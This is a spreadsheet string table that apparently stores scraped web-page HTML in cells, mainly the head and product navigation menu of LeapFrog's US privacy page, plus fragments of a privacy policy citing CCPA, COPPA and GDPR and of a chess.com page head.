    <t>class="c7 lst-kix_list_2-1 start" start="1"&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;This Privacy Policy is drafted with adherence to the applicable privacy protection laws, including following legislation:&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-2 start" start="1"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;California Consumer Privacy Act (&amp;ldquo;CCPA&amp;rdquo;):&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c28 c17 c22"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=http://leginfo.legislature.ca.gov/faces/codes_displayText.xhtml?lawCode%3DCIV%26division%3D3.%26title%3D1.81.5.%26part%3D4.%26chapter%3D%26article%3D&amp;amp;sa=D&amp;amp;ust=1607602738195000&amp;amp;usg=AOvVaw1GX84Nj_uTAVhP_iQVrCQl"&gt;http://leginfo.legislature.ca.gov/faces/codes_displayText.xhtml?lawCode=CIV&amp;amp;division=3.&amp;amp;title=1.81.5.&amp;amp;part=4.&amp;amp;chapter=&amp;amp;article=&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-2" start="2"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Children&amp;#39;s Online Privacy Protection Rule (&amp;quot;COPPA&amp;quot;)&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c17 c22 c28"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://uscode.house.gov/view.xhtml?path%3D/prelim@title15/chapter91%26edition%3Dprelim&amp;amp;sa=D&amp;amp;ust=1607602738195000&amp;amp;usg=AOvVaw1ibRjxFnA98UgMN4qnvOD0"&gt;https://uscode.house.gov/view.xhtml?path=/&lt;span class="__cf_email__" data-cfemail="106062757c797d506479647c752125"&gt;[email&amp;#160;protected]&lt;/span&gt;/chapter91&amp;amp;edition=prelim&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-2" start="3"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Regulation (EU) 2016/679 of the European Parliament and of the Council of 27 April 2016 on the protection of natural persons with regard to the processing of personal data and on the free movement of such data, and repealing Directive 95/46/EC (General Data Protection Regulation or &amp;ldquo;GDPR&amp;rdquo;)&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c8 c17 c22"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://eur-lex.europa.eu/eli/reg/2016/679/oj&amp;amp;sa=D&amp;amp;ust=1607602738196000&amp;amp;usg=AOvVaw0TkrFZDgyzmJSErWWHEgXD"&gt;https://eur-lex.europa.eu/eli/reg/2016/679/oj&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="c8 c12"&gt;&lt;span</t>
  </si>
  <si>
    <t>css2?family=Montserrat:wght@100;300;400;600;700&amp;display=swap" rel="stylesheet"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/cookieconsent.css?v=1681340241"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/master.min.css?v=1681340241"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</si>
  <si>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 xml:space="preserve">
&lt;!DOCTYPE HTML&gt;
&lt;html lang="en-us"&gt;
&lt;!--  /apps/leapfrog/components/page/page/head.jsp --&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
	&lt;meta http-equiv="content-type" content="text/html; charset=UTF-8"&gt;_x005F_x000D_
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /&gt;_x005F_x000D_
    &lt;meta name="viewport" content="width=device-width, initial-scale=1"/&gt;_x005F_x000D_
            &lt;script src="//shared.leapfrog.com/v23-magento/assets/js/cq/vendor/browsermap.standard.min.js" type="text/javascript"&gt;&lt;/script&gt;            
            &lt;script&gt;
                 BrowserMap.getDeviceGroupByName('tablet').isSelector = false;
                BrowserMap.getDeviceGroupByName('highResolutionDisplay').isSelector = false;
                BrowserMap.forwardRequest();
            &lt;/script&gt;
&lt;!-- page --&gt;_x005F_x000D_
    _ x000D_
    &lt;!--</t>
  </si>
  <si>
    <t>extra-includes.jsp intentionally blank in our base template --&gt;&lt;!-- google analytics--&gt;_x005F_x000D_
    &lt;!-- facebook meta tags --&gt;
&lt;meta property="fb:app_id" content="129125610496936" /&gt;
&lt;meta property="og:type" content="article"/&gt;
&lt;meta property="og:title" content="Privacy"/&gt;
&lt;meta property="og:url" content="https://www.leapfrog.com/en-us/legal/privacy.html"/&gt;
&lt;meta property="og:image" content="https://t7.leapfrog.com/images/lp-site-icon/LearningPath_1024x1024.jpg"/&gt;
    &lt;meta property="og:description" content="Learn more about the LeapFrog privacy policy where we'll enrich your children's lives through learning while having fun.</t>
  </si>
  <si>
    <t>View our policy. "/&gt;
    &lt;meta property="og:site_name" content="LeapFrog"/&gt;
&lt;!-- end of facebook meta tags --&gt;
&lt;!-- seo description --&gt;_x005F_x000D_
    &lt;meta name="description" content="Learn more about the LeapFrog privacy policy where we'll enrich your children's lives through learning while having fun. View our policy.</t>
  </si>
  <si>
    <t>"&gt;_x005F_x000D_
        &lt;!-- end seo description --&gt;_x005F_x000D_
    &lt;meta name="keywords" content=""&gt;_x005F_x000D_
_x005F_x000D_
&lt;link rel="shortcut icon" href="//shared.leapfrog.com/v23-magento/assets/img/cq/favicon.ico" type="image/x-icon"&gt;_x005F_x000D_
    _ x000D_
    &lt;link rel="alternate" hreflang="en-ca" href="https://www.leapfrog.com/en-ca/legal/privacy"/&gt;
	&lt;link rel="alternate" hreflang="en-gb" href="https://www.leapfrog.com/en-gb/legal/privacy"/&gt;
	&lt;link rel="alternate" hreflang="en-au" href="https://www.leapfrog.com/en-au/legal/privacy"/&gt;
	&lt;link rel="alternate" hreflang="en-ie" href="https://www.leapfrog.com/en-ie/legal/privacy"/&gt;
	&lt;link rel="alternate" hreflang="en-oe" href="https://www.leapfrog.com/en-oe/legal/privacy"/&gt;
	&lt;link rel="alternate" hreflang="fr-fr" href="https://www.leapfrog.com/fr-fr/legal/privacy"/&gt;
	&lt;link rel="alternate" hreflang="fr-ca" href="https://www.leapfrog.com/fr-ca/legal/privacy"/&gt;
	&lt;link rel="alternate" hreflang="fr-of" href="https://www.leapfrog.com/fr-of/legal/privacy"/&gt;
	&lt;link rel="alternate" hreflang="es-es" href="https://www.leapfrog.com/es-es/legal/privacy"/&gt;
	&lt;!--smartphone meta link smartphoneMode:false --&gt;
&lt;link rel="alternate" media="only screen and (max-width: 640px)"</t>
  </si>
  <si>
    <t xml:space="preserve">href="https://www.leapfrog.com/en-us/legal/privacy.smartphone"/&gt;
			&lt;title&gt;Privacy | LeapFrog&lt;/title&gt;_x005F_x000D_
        &lt;link href="https://plus.google.com/113921752982973612429" rel="publisher"/&gt;
&lt;link rel="stylesheet" href="//shared.leapfrog.com/v23-magento/assets/css/cq/vendor/normalize.css" type="text/css"/&gt;
&lt;link rel="stylesheet" href="//shared.leapfrog.com/v23-magento/assets/css/cq/vendor/bootstrap.css" type="text/css"/&gt;
&lt;link rel="stylesheet" href="//shared.leapfrog.com/v23-magento/assets/css/cq/web/global/cq-hf.css" type="text/css"/&gt;
&lt;link rel="stylesheet" href="//shared.leapfrog.com/v23-magento/assets/css/cq/web/global/share-classes.css" type="text/css"/&gt;
&lt;link rel="stylesheet" href="//shared.leapfrog.com/v23-magento/assets/css/vendor/font-awesome.min.css" type="text/css"&gt;
&lt;link rel="stylesheet" href="//shared.leapfrog.com/v23-magento/legacy-assets/css/fonts.css" type="text/css"/&gt;
&lt;script type="text/javascript"&gt;_x005F_x000D_
         var lf = {_x005F_x000D_
          "data": {_x005F_x000D_
            "xhr": {_x005F_x000D_
              "siteBaseUrl": "/en-us/app-center",_x005F_x000D_
              "assetsPath": "//shared.leapfrog.com/v23-magento",_x005F_x000D_
              "imagesPath": "//shared.leapfrog.com/v23-magento/legacy-assets/img",_x005F_x000D_
              "client": {_x005F_x000D_
                mode: "web",_x005F_x000D_
                deviceMode: "",_x005F_x000D_
                isDesktop: true,_x005F_x000D_
                isDevice: false,_x005F_x000D_
                isLFC: false,_x005F_x000D_
                isMobile: false,_x005F_x000D_
                isMobileLayer: false,_x005F_x000D_
                layout: "desktop",_x005F_x000D_
                mobileUI: false_x005F_x000D_
              },_x005F_x000D_
              "user": {_x005F_x000D_
                status: "GUEST",_x005F_x000D_
                isGuest: true,_x005F_x000D_
                isRecognized: false,_x005F_x000D_
                isLoggedIn: false,_x005F_x000D_
                </t>
  </si>
  <si>
    <t>isLoggedInUsingSSO: false_x005F_x000D_
              },_x005F_x000D_
              "shop": {},_x005F_x000D_
            },_x005F_x000D_
            "i18n": {_x005F_x000D_
              "notify": {_x005F_x000D_
                "generalErrorTitle": "Oops! We encountered a problem. ",_x005F_x000D_
                "generalErrorText": "Please refresh the page and try again.</t>
  </si>
  <si>
    <t>"_x005F_x000D_
              }_x005F_x000D_
            }_x005F_x000D_
          }_x005F_x000D_
        };_x005F_x000D_
         window.dataLayer = [];_x005F_x000D_
    &lt;/script&gt;_x005F_x000D_
    &lt;script type="text/javascript" src="https://store.leapfrog.com/en-us/frontend/xhr/data/action/jsData?dataIncludes=xhr,i18n"&gt;&lt;/script&gt;_x005F_x000D_
        &lt;script type="text/javascript" src="//shared.leapfrog.com/v23-magento/assets/js/stable/dist/lf.desktop.libs.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script type="text/javascript" src="//shared.leapfrog.com/v23-magento/assets/js/stable/dist/lf.desktop.app.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script type="text/javascript"&gt;_x005F_x000D_
      var gaAccountID</t>
  </si>
  <si>
    <t xml:space="preserve">[];_x005F_x000D_
      dataLayer.push({_x005F_x000D_
        pageTemplate: '/apps/leapfrog/templates/page/content-page',_x005F_x000D_
        pageCategory: 'Corporate'_x005F_x000D_
      });_x005F_x000D_
    &lt;/script&gt;   _x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;!-- /apps/leapfrog/components/page/content-page/body.jsp --&gt;
&lt;body ng-app="lf.desktop" id="lf.desktop" ng-controller="AppCtrl" wrap-nav-account="external" class="cq-body body-bg-white en_US" vocab="https://schema.org" typeof="WebPage" data-ga-l1='Legal'&gt;
&lt;!-- Google Tag Manager --&gt;
    &lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-RNGS" height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;
    &lt;script&gt;(function(w,d,s,l,i) { 
             w[l]=w[l]||[];
             w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
             </t>
  </si>
  <si>
    <t>var f=d.getElementsByTagName(s)[0],
             j=d.createElement(s),
             dl=l!='dataLayer'?'&amp;l='+l:'';
             j.async=true;
             j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;
             f.parentNode.insertBefore(j,f);
            })(window,document,'script','dataLayer','GTM-RNGS');
    &lt;/script&gt;
    &lt;!-- End Google Tag Manager --&gt;
&lt;header&gt;
&lt;div class="par parsys"&gt;&lt;div class="parbase main-header section"&gt;&lt;div id="header"&gt;
        &lt;div class="navbar"&gt;&lt;!--  navbar-static-top" --&gt;
            &lt;div class="navbar-inner"&gt;
                &lt;div class="container"&gt;
                    &lt;div id="anchor-top"&gt;
                        &lt;a name="pageTop"&gt;&lt;/a&gt;
                        &lt;a class="brand" href="/en-us/home" title="leapfrog.com"&gt;
                                &lt;img src="//t7.leapfrog.com/images/page-promo/cq_lf_logo.png" alt="LeapFrog&amp;#x20;Home"/&gt;&lt;/a&gt;
                        &lt;/div&gt;
                    &lt;div class="topnav"&gt;
                        &lt;nav aria-label="Main"&gt;
                            &lt;ul class="nav nav-main"&gt;
                                &lt;li class="top-divider dropdown"&gt;
                                            &lt;a href="https://store.leapfrog.com/en-us/store/c" aria-controls="products-menu" title="Products" data-toggle="dropdown" class="dropdown-toggle"&gt;Products&lt;/a&gt;
                                                    &lt;div id="products-menu" class="dropdown-menu dropdown-top cols3"&gt;
                                                        &lt;div&gt;
                                                            &lt;ul aria-labelledby="browse-all-products-label"&gt;
                                                                    &lt;li class="dropdown-heading"&gt;
                                                                                        &lt;a id="browse-all-products-label" href="https://store.leapfrog.com/en-us/store/c" target="_self" title="BROWSE ALL PRODUCTS" role="heading" aria-level="2"&gt;BROWSE ALL PRODUCTS&lt;/a&gt;
                                                                                    &lt;/li&gt;
                                                                                &lt;/ul&gt;
                                                                &lt;ul aria-labelledby="at-home-learning-label"&gt;
                                                                    &lt;li class="dropdown-heading"&gt;
                                                                                        &lt;a id="at-home-learning-label" href="/en-us/learning-path/learning-at-home" target="_self" title="At-Home Learning" role="heading" aria-level="2"&gt;At-Home Learning&lt;/a&gt;
                                                                                    &lt;/li&gt;
                                                                                &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/academy/landing" target="_self" title="LeapFrog Academy"&gt;LeapFrog Academy&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/c" target="_self" title="Learning Toys"&gt;Learning Toys&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="/en-us/learning-path" target="_self" title="Learning Path"&gt;Learning Path&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;/ul&gt;
                                                                &lt;ul aria-labelledby="learning-tablets-label"&gt;
                                                                    &lt;li id="learning-tablets-label" class="dropdown-heading" role="heading" aria-level="2"&gt;LEARNING TABLETS&lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="/en-us/products/tablet-family" target="_self" title="LeapPad Academy"&gt;LeapPad Academy&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/leappad-ultimate-ready-for-school/_/A-prod80-602070" target="_self" title="LeapPad Ultimate"&gt;LeapPad Ultimate&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/leapfrog-epic-academy-edition/_/A-prod80-602200" target="_self" title="LeapFrog Epic Academy"&gt;LeapFrog Epic Academy&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/leapfrog-epic-7-kids-tablet-with-16gb-memory-and-quadcore-processor/_/A-prod31576" target="_self" title="LeapFrog Epic"&gt;LeapFrog Epic&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;/ul&gt;
                                                                 &lt;ul aria-labelledby="learning-video-games-&amp;-apps-label"&gt;
                                                                    &lt;li id="learning-video-games-&amp;-apps-label" class="dropdown-heading" role="heading" aria-level="2"&gt;Learning Video Games &amp; Apps&lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="/en-us/products/leapland-adventures" target="_self" title="LeapLand Adventures"&gt;LeapLand Adventures&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/app-center/c" target="_self" title="Browse All Apps"&gt;Browse All Apps&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/c?format=256" target="_self" title="Browse All Cartridge Games"&gt;Browse All Cartridge Games&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;/ul&gt;
                                                                &lt;/div&gt;
                                                                    &lt;div&gt;
                                                                &lt;ul aria-labelledby="browse-learning-systems-label"&gt;
                                                                    &lt;li class="dropdown-heading"&gt;
                                                                                        &lt;a id="browse-learning-systems-label" href="/en-us/products/reading-family" target="_self" title="BROWSE LEARNING SYSTEMS" role="heading" aria-level="2"&gt;BROWSE LEARNING SYSTEMS&lt;/a&gt;
                                                                                    &lt;/li&gt;
                                                                                &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/leapstart-preschool-success/_/A-prod80-602170" target="_self" title="LeapStart Preschool Success"&gt;LeapStart Preschool Success&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/leapstart-go/_/A-prod80-605900" target="_self" title="LeapStart Go"&gt;LeapStart Go&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/leapstart-3d-green/_/A-prod80-603900" target="_self" title="LeapStart 3D"&gt;LeapStart 3D&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/leapreader-reading-and-writing-system/_/A-prod21301" target="_self" title="LeapReader (4-8 yrs.)"&gt;LeapReader (4-8 yrs.)&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/c?format=321" target="_self" title="Book Library"&gt;Book Library&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;/ul&gt;
                                                                &lt;ul aria-labelledby="browse-learning-toys-label"&gt;
                                                                    &lt;li class="dropdown-heading"&gt;
                                                                                        &lt;a id="browse-learning-toys-label" href="/en-us/products/toys-family" target="_self" title="BROWSE LEARNING TOYS" role="heading" aria-level="2"&gt;BROWSE LEARNING TOYS&lt;/a&gt;
                                                                                    &lt;/li&gt;
                                                                                &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/go/bluesclues" target="_self" title="Blue's Clues &amp; You!™"&gt;Blue's Clues &amp; You!™&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="/en-us/products/leapbuilders" target="_self" title="LeapBuilders Playsets"&gt;LeapBuilders Playsets&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/magic-adventures-globe/_/A-prod80-605400" target="_self" title="Magic Adventures Globe"&gt;Magic Adventures Globe&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="/en-us/products/rockit-twist" target="_self" title="RockIt Twist"&gt;RockIt Twist&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/c?age_years=82" target="_self" title="Infant (3-12 months)"&gt;Infant (3-12 months)&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/c?age_years=182_183_184" target="_self" title="Toddler (1-3 yrs.)"&gt;Toddler (1-3 yrs.)&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/c?age_years=184_185" target="_self" title="Preschool (3-4 yrs.)"&gt;Preschool (3-4 yrs.)&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/c?age_years=185_186" target="_self" title="Pre-K (4-5</t>
  </si>
  <si>
    <t xml:space="preserve">yrs.)"&gt;Pre-K (4-5 yrs.)&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/c?age_years=186_187" target="_self" title="Kindergarten (5-6 yrs.)"&gt;Kindergarten (5-6 yrs.)&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/c?age_years=187_188_189_190" target="_self" title="First Grade &amp; Beyond (6+ yrs.)"&gt;First Grade &amp; Beyond (6+ yrs.)&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;/ul&gt;
                                                                &lt;/div&gt;
                                                                    &lt;div&gt;
                                                                &lt;ul aria-labelledby="browse-baby-care-label"&gt;
                                                                    &lt;li class="dropdown-heading"&gt;
                                                                                        &lt;a id="browse-baby-care-label" href="/en-us/products/baby-care" target="_self" title="BROWSE BABY CARE" role="heading" aria-level="2"&gt;BROWSE BABY CARE&lt;/a&gt;
                                                                                    &lt;/li&gt;
                                                                                &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/baby-monitor-lf930hd/_/A-prod80-2522" target="_self" title="LF930HD Smart Baby Monitor"&gt;LF930HD Smart Baby Monitor&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/baby-monitor-lf925hd/_/A-prod80-2520" target="_self" title="LF925HD Smart Baby Monitor"&gt;LF925HD Smart Baby Monitor&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/baby-monitor-lf925-2hd/_/A-prod80-2546" target="_self" title="LF925-2HD Smart Baby Monitor"&gt;LF925-2HD Smart Baby Monitor&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/baby-monitor-lf815hd/_/A-prod80-2517" target="_self" title="LF815HD Smart Baby Monitor"&gt;LF815HD Smart Baby Monitor&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/baby-monitor-lf815-2hd/_/A-prod80-2545" target="_self" title="LF815-2HD Smart Baby Monitor"&gt;LF815-2HD Smart Baby Monitor&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/baby-monitor-lf920hd/_/A-prod80-2367" target="_self" title="LF920HD Video Baby Monitor"&gt;LF920HD Video Baby Monitor&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/baby-monitor-lf915hd/_/A-prod80-2527" target="_self" title="LF915HD Video Baby Monitor"&gt;LF915HD Video Baby Monitor&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/p/baby-monitor-lf2423/_/A-prod80-2813" target="_self" title="LF2423 Video Baby Monitor"&gt;LF2423 Video Baby Monitor&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;/ul&gt;
                                                                &lt;ul aria-labelledby="support-label"&gt;
                                                                    &lt;li id="support-label" class="dropdown-heading" role="heading" aria-level="2"&gt;Support&lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="/en-us/support/connect" target="_self" title="Download Connect Software"&gt;Download Connect Software&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="/en-us/support" target="_self" title="Customer Service"&gt;Customer Service&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="/en-us/support/products" target="_self" title="Support by Product"&gt;Support by Product&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;/ul&gt;
                                                                &lt;ul aria-labelledby="more-from-leapfrog-label"&gt;
                                                                    &lt;li id="more-from-leapfrog-label" class="dropdown-heading" role="heading" aria-level="2"&gt;MORE FROM LEAPFROG&lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/go/top-gifts" target="_self" title="Gift Guide"&gt;Gift Guide&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/c?format=466" target="_self" title="Learning DVDs"&gt;Learning DVDs&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/store/c?product_families=215" target="_self" title="Accessories"&gt;Accessories&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="/en-us/cares" target="_self" title="LeapFrog Cares"&gt;LeapFrog Cares&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;/ul&gt;
                                                                &lt;/div&gt;
                                                    &lt;/div&gt;
                                                &lt;/li&gt;
                                    &lt;li class="top-divider dropdown"&gt;
                                            &lt;a href="https://store.leapfrog.com/en-us/app-center/c" aria-controls="app-center-menu" title="App Center" data-toggle="dropdown" class="dropdown-toggle"&gt;App Center&lt;/a&gt;
                                                    &lt;div id="app-center-menu" class="dropdown-menu dropdown-top cols3"&gt;
                                                        &lt;div&gt;
                                                            &lt;ul aria-labelledby="shop-all-apps-label"&gt;
                                                                    &lt;li class="dropdown-heading"&gt;
                                                                                        &lt;a id="shop-all-apps-label" href="https://store.leapfrog.com/en-us/app-center/c" target="_self" title="SHOP ALL APPS" role="heading" aria-level="2"&gt;SHOP ALL APPS&lt;/a&gt;
                                                                                    &lt;/li&gt;
                                                                                &lt;/ul&gt;
                                                                &lt;ul aria-labelledby="shop-apps-by-device-label"&gt;
                                                                    &lt;li id="shop-apps-by-device-label" class="dropdown-heading" role="heading" aria-level="2"&gt;SHOP APPS BY DEVICE&lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/app-center/c?platforms=210" target="_self" title="LeapPad Academy"&gt;LeapPad Academy&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/app-center/c?platforms=211_436" target="_self" title="LeapFrog Epic"&gt;LeapFrog Epic&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/app-center/c?platforms=377" target="_self" title="LeapPad Ultimate"&gt;LeapPad Ultimate&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/app-center/c?platforms=408" target="_self" title="LeapPad Jr."&gt;LeapPad Jr.&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/app-center/c?platforms=272" target="_self" title="LeapPad Platinum"&gt;LeapPad Platinum&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/app-center/c?platforms=197" target="_self" title="LeapPad Ultra"&gt;LeapPad Ultra&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                            &lt;li&gt;
                                                                                    &lt;a href="https://store.leapfrog.com/en-us/app-center/c?platforms=194" target="_self" title="LeapPad3"&gt;LeapPad3&lt;/a&gt;
                                                                                &lt;/li&gt;
                                                                </t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!DOCTYPE html&gt;
&lt;html
  xmlns="http://www.w3.org/1999/xhtml"
  xml:lang="en-US"
  lang="en-US"
  dir="ltr"
  xmlns:fb="http://ogp.me/ns/fb#" 
  class="shiftless-scrollbar  user-logged-out"&gt;
&lt;head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# game: http://ogp.me/ns/game#"&gt;
        &lt;meta charset="utf-8" /&gt;
    &lt;meta name="ROBOTS" content="NOODP" /&gt;
    &lt;meta name="ROBOTS" content="NOYDIR" /&gt;
        &lt;meta name="verify-v1" content="TgxixMKtxcQ+9NUdD7grKbzw3tAl3iJWlTPSPKt9t0I=" /&gt;
    &lt;meta name="p:domain_verify" content="314c7ba9469cc171a12a46b43e0e2aed" /&gt;
    &lt;meta name="google-site-verification" content="n7BdKb0xn1E9tRJXvmMxE3Ynr-QajBOi1yA1srT4Nrc" /&gt;
          &lt;meta name="apple-itunes-app" content="app-id=329218549"&gt;
        &lt;meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"&gt;
    &lt;link rel="preconnect" href="//www.chess.com"&gt;
  &lt;link rel="preconnect" href="//images.chesscomfiles.com"&gt;
    &lt;link rel="dns-prefetch" href="//www.chess.com"&gt;
  &lt;link rel="dns-prefetch" href="//images.chesscomfiles.com"&gt;
      &lt;link rel="preconnect" href="https://config.playwire.com" crossorigin/&gt;
&lt;link rel="preconnect" href="https://cdn.intergi.com" crossorigin/&gt;
&lt;link rel="preconnect" href="https://cdn.intergient.com" crossorigin/&gt;
&lt;link rel="preconnect" href="https://securepubads.g.doubleclick.net" crossorigin/&gt;
&lt;link rel="preconnect" href="https://cdn.playwire.com" crossorigin/&gt;
&lt;link rel="preconnect" href="https://z.moatads.com" crossorigin/&gt;
&lt;link
  as="font"
  crossorigin="crossorigin"
  href="/bundles/web/fonts/chessglyph-v3/chessglyph-v3.0e06d716.woff2"
  rel="preload"
  type="font/woff2"&gt;
&lt;link
  as="font"
  crossorigin="crossorigin"
  href="/bundles/web/fonts/montserrat-700.2213e098.woff2"
  rel="preload"
  type="font/woff2"&gt;
&lt;link
  as="font"
  crossorigin="crossorigin"
  href="/bundles/web/fonts/montserrat-800.2d88ac8b.woff2"
  rel="preload"
  type="font/woff2"&gt;
&lt;link rel="mask-icon" href="/bundles/web/favicons/safari-pinned-tab.1bf62bbf.svg" color="#4E7838"&gt;
